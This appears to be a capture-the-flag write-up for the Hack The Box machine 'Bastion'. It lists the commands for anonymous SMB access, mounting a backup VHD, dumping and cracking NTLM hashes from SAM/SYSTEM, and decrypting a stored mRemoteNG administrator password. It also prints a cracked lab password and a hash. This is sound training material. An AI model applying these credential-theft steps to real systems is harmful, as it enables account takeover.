Box: Bastion
Level: Easy
OS: Windows
Lets get started
Recon
Portscanning
command:sudo nmap -A 10.129.153.193 -T4 -v -p-
Nmap scan report for 10.129.153.193
Host is up (0.16s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a56ae753c780ec8564dcb1c22bf458a (RSA)
| 256 cc2e56ab1997d5bb03fb82cd63da6801 (ECDSA)
|_ 256 935f5daaca9f53e7f282e664a8a3a018 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Well, only 4 open ports here are worth focusing on. Port 22, Port 135, Port 139 and Port 445. Well, our enumeration will be focused more on port 445.
Enumeration
We can start off my checking the number of shares available on the smb server
command:smbclient -L 10.129.153.193
This will prompt you for a password, you don’t have to worry about that, just hit the Enter key.
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ smbclient -L 10.129.153.193
Password for [WORKGROUP\bl4ck4non]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.153.193 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
4 shares are available on this server, all the shares are standard smb shares except for the sharename Backups. Lets try connecting to this share, this is so we can view the files available on the share
command:smbclient //10.129.153.193/Backups
This will prompt you for a password, you don’t have to worry about that, just hit the Enter key.
We have a .txt,.tmp file and also a windowsimagebackup directory available on this share. well, lets take a look at that directory
After checking through the directories we find 2 disk images, lets download them to our machine using the get command
I’m not sure this will be possible, we’ve already been told about this in the note.txt file😅
Well, this doesn’t mean we can’t mount it though🤔.
Now that we know the way to go, lets exploit😎
Exploitation
We can start by creating a directory we want the file to be mounted to
command:sudo mkdir /mnt/bastion_backup
Then we can mount,
command:sudo mount -t cifs //10.129.153.193/Backups /mnt/bastion_backup
This will prompt you for a password, you don’t have to worry about that, just hit the Enter key.
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ sudo mkdir /mnt/bastion_backup
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ sudo mount -t cifs //10.129.153.193/Backups /mnt/bastion_backup
Password for root@//10.129.153.193/Backups:
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ cd /mnt/bastion_backup
┌──(bl4ck4non㉿bl4ck4non)-[/mnt/bastion_backup]
└─$ ls -la
total 9
drwxr-xr-x 2 root root 4096 Apr 16 2019 .
drwxr-xr-x 3 root root 4096 Sep 17 04:47 ..
-r-xr-xr-x 1 root root 116 Apr 16 2019 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 2019 SDT65CB.tmp
drwxr-xr-x 2 root root 0 Feb 22 2019 WindowsImageBackup
The mounting was a success hehe, now we can locate the vhd files
Well, lets mount the vhd disk files. Before we start mounting we have to install the required tools
command:sudo apt-get install qemu-utils
Next is to load the NBD (Network Block Device) Module,
command:sudo modprobe nbd
Now, we can mount the vhd file
command:sudo qemu-nbd -c /dev/nbd0/ /mnt/bastion_backup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
Next thing to do is partition and mount the disk,
command:sudo fdisk -l /dev/nbd0
create a mount point and mount the partition
command:sudo mkdir /mnt/vhd_mount
command:sudo mount /dev/nbd0pX /mnt/vhd_mount
Replace X with the appropriate partition number based on the output of fdisk. In my case it’s nbd0p1
Now, we can access the mounted VHD
Nice stuff hehe😎
Going through the files on the disk I found a SAM (Security Accounts Manager) file and a registry hehe, this means we can dump some NTLM hashes😎. These files are always stored in the C:\Windows\System32\config directory
Lets Navigate there
We can try sending these files to a different directory
Nice
So, we can use this tool to dump the ntlm hash
To dump the NTLM hashes
command:samdump2 SYSTEM SAM
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
We were able to dump the NTLM hashes, but all have been disabled except for user L4mpje. We can crack this using john
command:john hash.txt --wordlist=/home/bl4ck4non/Documents/rockyou.txt --format=NT
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ nano hash.txt
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ cat hash.txt
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ john hash.txt --wordlist=/home/bl4ck4non/Documents/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje (L4mpje)
1g 0:00:00:01 DONE (2023-09-17 14:51) 0.6329g/s 5946Kp/s 5946Kc/s 5946KC/s burg772v..burdy1
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
We were able to get the password for user L4mpje with the help of my bro John😂. Now that we have a password, we can ssh into the server as user L4mpje
We’ve successfully gotten user access hehe. Lets go ahead and escalate our privileges
Privilege Escalation
I found a remote connection management tool that stores user encrypted passwords C:\Program Files (x86)
Well, doing some research about this I found this
We got the name of the file where the passwords are stored at. Running a quick directory search command dir /s /b confCons.xml
Cool, we got the full path already. To view the contents of the file
command:type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
We got the encrypted password for the administrator user hehe. Lets crack it.
We can use the mRemoteNG-Decrypt tool for this. You can get this from this repo
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
Cloning into 'mRemoteNG-Decrypt'...
remote: Enumerating objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19
Receiving objects: 100% (19/19), 14.80 KiB | 105.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion]
└─$ cd mRemoteNG-Decrypt
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion/mRemoteNG-Decrypt]
└─$ ls
LICENSE mremoteng_decrypt.py README.md
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/bastion/mRemoteNG-Decrypt]
└─$ python mremoteng_decrypt.py
usage: mremoteng_decrypt.py [-h] [-f FILE | -s STRING] [-p PASSWORD]
Decrypt mRemoteNG passwords.
options:
-h, --help show this help message and exit
-f FILE, --file FILE name of file containing mRemoteNG password
-s STRING, --string STRING
base64 string of mRemoteNG password
-p PASSWORD, --password PASSWORD
Custom password
To crack the password
command:python mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
We were able to successfully crack the password hehe. Now we can ssh into the server as the administrator user
command:ssh Administrator@10.129.76.187
Box Pwned Successfully😎
That will be all for today
Back To Home